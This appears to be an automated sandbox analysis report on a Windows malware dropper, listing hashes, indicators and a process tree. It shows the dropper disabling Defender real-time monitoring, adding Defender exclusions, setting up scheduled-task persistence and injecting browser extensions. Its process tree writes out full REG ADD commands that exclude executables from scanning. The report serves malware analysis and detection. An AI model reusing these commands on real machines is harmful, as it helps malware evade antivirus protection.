Analysis
-
max time kernel
152s -
max time network
157s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
07/11/2022, 04:44
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220901-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
09d27c00cd3e46dc00978118dc77975f
-
SHA1
19cc0dae38c5061e3b015ccdd980e19f0a418745
-
SHA256
fe962479008c9cda3a44367da6d3de18a6086913990c07265bdc13841ab00472
-
SHA512
f0fd3f346cc1cd5b535f3acb8cef9c55276eb87eb458fc4164856013afd398ba58cff216586b88d906c60fcdbc53322cc142e4d8eedc5f4a0230129210e82b98
-
SSDEEP
196608:91OjRbLS7MphE1sESdQPTcNh05a3/O0zl1kyeBCXuiE:3O9PcuSSEBYhV3/pCyYCA
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\DILCTKEfLzwxpUyr = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SrbNtFTauyXrrauqwiR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nzSBDbWiXDUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\DILCTKEfLzwxpUyr = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\DILCTKEfLzwxpUyr = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\tNfKPRmJVxztHuVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\FsvZBHDEoMJqPIdDe = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JZGCYhgnU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nzSBDbWiXDUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\obMwGijWRaGU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lddEbzjsVrMsC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\FsvZBHDEoMJqPIdDe = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\DILCTKEfLzwxpUyr = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JZGCYhgnU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\tNfKPRmJVxztHuVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\SrbNtFTauyXrrauqwiR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lddEbzjsVrMsC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\obMwGijWRaGU2 = "0" reg.exe -
Executes dropped EXE 4 IoCs
pid Process 1124 Install.exe 1312 Install.exe 616 AIwWYeG.exe 1856 GKsdSKe.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation GKsdSKe.exe -
Loads dropped DLL 12 IoCs
pid Process 1468 file.exe 1124 Install.exe 1124 Install.exe 1124 Install.exe 1124 Install.exe 1312 Install.exe 1312 Install.exe 1312 Install.exe 284 rundll32.exe 284 rundll32.exe 284 rundll32.exe 284 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json GKsdSKe.exe -
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini AIwWYeG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA GKsdSKe.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol GKsdSKe.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_5C3F4CB4665DCF2109A8C91DBA78E447 GKsdSKe.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol AIwWYeG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA GKsdSKe.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_3B0C6F9A5FE4CC35B9E0194525154B89 GKsdSKe.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol AIwWYeG.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat GKsdSKe.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_5C3F4CB4665DCF2109A8C91DBA78E447 GKsdSKe.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA GKsdSKe.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA GKsdSKe.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_3B0C6F9A5FE4CC35B9E0194525154B89 GKsdSKe.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak GKsdSKe.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja GKsdSKe.exe File created C:\Program Files (x86)\obMwGijWRaGU2\YkGpsrNIgEOKR.dll GKsdSKe.exe File created C:\Program Files (x86)\lddEbzjsVrMsC\KJjXhLE.dll GKsdSKe.exe File created C:\Program Files (x86)\lddEbzjsVrMsC\uyigtin.xml GKsdSKe.exe File created C:\Program Files (x86)\JZGCYhgnU\kprIEK.dll GKsdSKe.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi GKsdSKe.exe File created C:\Program Files (x86)\obMwGijWRaGU2\KtopUFT.xml GKsdSKe.exe File created C:\Program Files (x86)\SrbNtFTauyXrrauqwiR\sAwRwXu.dll GKsdSKe.exe File created C:\Program Files (x86)\SrbNtFTauyXrrauqwiR\grfOmcR.xml GKsdSKe.exe File created C:\Program Files (x86)\nzSBDbWiXDUn\BgDWaRO.dll GKsdSKe.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi GKsdSKe.exe File created C:\Program Files (x86)\JZGCYhgnU\OtIlmba.xml GKsdSKe.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bbZBZlssUwCOpuYirz.job schtasks.exe File created C:\Windows\Tasks\WYhCOaFbDtTPETeNM.job schtasks.exe File created C:\Windows\Tasks\OCFazbYebRpcntc.job schtasks.exe File created C:\Windows\Tasks\AnwxygIojuyXYtxEH.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1504 schtasks.exe 1900 schtasks.exe 1220 schtasks.exe 576 schtasks.exe 1968 schtasks.exe 2028 schtasks.exe 1328 schtasks.exe 1736 schtasks.exe 1832 schtasks.exe 2040 schtasks.exe 2040 schtasks.exe 1160 schtasks.exe 1916 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs GKsdSKe.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8928E753-7159-46AD-9537-4B51D0E3D632} GKsdSKe.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8928E753-7159-46AD-9537-4B51D0E3D632}\WpadDecisionReason = "1" GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs GKsdSKe.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8928E753-7159-46AD-9537-4B51D0E3D632}\WpadNetworkName = "Network 2" GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates GKsdSKe.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-6f-1a-e7-0f-fc\WpadDecision = "0" GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings GKsdSKe.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" GKsdSKe.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8928E753-7159-46AD-9537-4B51D0E3D632}\9e-6f-1a-e7-0f-fc GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-6f-1a-e7-0f-fc\WpadDecisionTime = a04b9c0064f2d801 GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates GKsdSKe.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings GKsdSKe.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8928E753-7159-46AD-9537-4B51D0E3D632}\WpadDecision = "0" GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-6f-1a-e7-0f-fc GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{8928E753-7159-46AD-9537-4B51D0E3D632}\WpadDecisionTime = a04b9c0064f2d801 GKsdSKe.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9e-6f-1a-e7-0f-fc\WpadDecisionReason = "1" GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs GKsdSKe.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs GKsdSKe.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs GKsdSKe.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust GKsdSKe.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f000b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 GKsdSKe.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 872 powershell.EXE 872 powershell.EXE 872 powershell.EXE 1228 powershell.EXE 1228 powershell.EXE 1228 powershell.EXE 1488 powershell.EXE 1488 powershell.EXE 1488 powershell.EXE 1908 powershell.EXE 1908 powershell.EXE 1908 powershell.EXE 1856 GKsdSKe.exe 1856 GKsdSKe.exe 1856 GKsdSKe.exe 1856 GKsdSKe.exe 1856 GKsdSKe.exe 1856 GKsdSKe.exe 1856 GKsdSKe.exe 1856 GKsdSKe.exe 1856 GKsdSKe.exe 1856 GKsdSKe.exe 1856 GKsdSKe.exe 1856 GKsdSKe.exe 1856 GKsdSKe.exe 1856 GKsdSKe.exe 1856 GKsdSKe.exe 1856 GKsdSKe.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 872 powershell.EXE Token: SeDebugPrivilege 1228 powershell.EXE Token: SeDebugPrivilege 1488 powershell.EXE Token: SeDebugPrivilege 1908 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1468 wrote to memory of 1124 1468 file.exe 27 PID 1468 wrote to memory of 1124 1468 file.exe 27 PID 1468 wrote to memory of 1124 1468 file.exe 27 PID 1468 wrote to memory of 1124 1468 file.exe 27 PID 1468 wrote to memory of 1124 1468 file.exe 27 PID 1468 wrote to memory of 1124 1468 file.exe 27 PID 1468 wrote to memory of 1124 1468 file.exe 27 PID 1124 wrote to memory of 1312 1124 Install.exe 28 PID 1124 wrote to memory of 1312 1124 Install.exe 28 PID 1124 wrote to memory of 1312 1124 Install.exe 28 PID 1124 wrote to memory of 1312 1124 Install.exe 28 PID 1124 wrote to memory of 1312 1124 Install.exe 28 PID 1124 wrote to memory of 1312 1124 Install.exe 28 PID 1124 wrote to memory of 1312 1124 Install.exe 28 PID 1312 wrote to memory of 1364 1312 Install.exe 30 PID 1312 wrote to memory of 1364 1312 Install.exe 30 PID 1312 wrote to memory of 1364 1312 Install.exe 30 PID 1312 wrote to memory of 1364 1312 Install.exe 30 PID 1312 wrote to memory of 1364 1312 Install.exe 30 PID 1312 wrote to memory of 1364 1312 Install.exe 30 PID 1312 wrote to memory of 1364 1312 Install.exe 30 PID 1312 wrote to memory of 1840 1312 Install.exe 32 PID 1312 wrote to memory of 1840 1312 Install.exe 32 PID 1312 wrote to memory of 1840 1312 Install.exe 32 PID 1312 wrote to memory of 1840 1312 Install.exe 32 PID 1312 wrote to memory of 1840 1312 Install.exe 32 PID 1312 wrote to memory of 1840 1312 Install.exe 32 PID 1312 wrote to memory of 1840 1312 Install.exe 32 PID 1364 wrote to memory of 552 1364 forfiles.exe 35 PID 1364 wrote to memory of 552 1364 forfiles.exe 35 PID 1364 wrote to memory of 552 1364 forfiles.exe 35 PID 1364 wrote to memory of 552 1364 forfiles.exe 35 PID 1364 wrote to memory of 552 1364 forfiles.exe 35 PID 1364 wrote to memory of 552 1364 forfiles.exe 35 PID 1364 wrote to memory of 552 1364 forfiles.exe 35 PID 1840 wrote to memory of 932 1840 forfiles.exe 34 PID 1840 wrote to memory of 932 1840 forfiles.exe 34 PID 1840 wrote to memory of 932 1840 forfiles.exe 34 PID 1840 wrote to memory of 932 1840 forfiles.exe 34 PID 1840 wrote to memory of 932 1840 forfiles.exe 34 PID 1840 wrote to memory of 932 1840 forfiles.exe 34 PID 1840 wrote to memory of 932 1840 forfiles.exe 34 PID 552 wrote to memory of 1600 552 cmd.exe 36 PID 552 wrote to memory of 1600 552 cmd.exe 36 PID 552 wrote to memory of 1600 552 cmd.exe 36 PID 932 wrote to memory of 1944 932 cmd.exe 37 PID 932 wrote to memory of 1944 932 cmd.exe 37 PID 932 wrote to memory of 1944 932 cmd.exe 37 PID 552 wrote to memory of 1600 552 cmd.exe 36 PID 552 wrote to memory of 1600 552 cmd.exe 36 PID 552 wrote to memory of 1600 552 cmd.exe 36 PID 932 wrote to memory of 1944 932 cmd.exe 37 PID 932 wrote to memory of 1944 932 cmd.exe 37 PID 932 wrote to memory of 1944 932 cmd.exe 37 PID 552 wrote to memory of 1600 552 cmd.exe 36 PID 932 wrote to memory of 1944 932 cmd.exe 37 PID 932 wrote to memory of 1888 932 cmd.exe 38 PID 932 wrote to memory of 1888 932 cmd.exe 38 PID 932 wrote to memory of 1888 932 cmd.exe 38 PID 932 wrote to memory of 1888 932 cmd.exe 38 PID 932 wrote to memory of 1888 932 cmd.exe 38 PID 932 wrote to memory of 1888 932 cmd.exe 38 PID 932 wrote to memory of 1888 932 cmd.exe 38 PID 552 wrote to memory of 1096 552 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Users\Admin\AppData\Local\Temp\7zS17A7.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Users\Admin\AppData\Local\Temp\7zS1D13.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:552 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1600
-
-
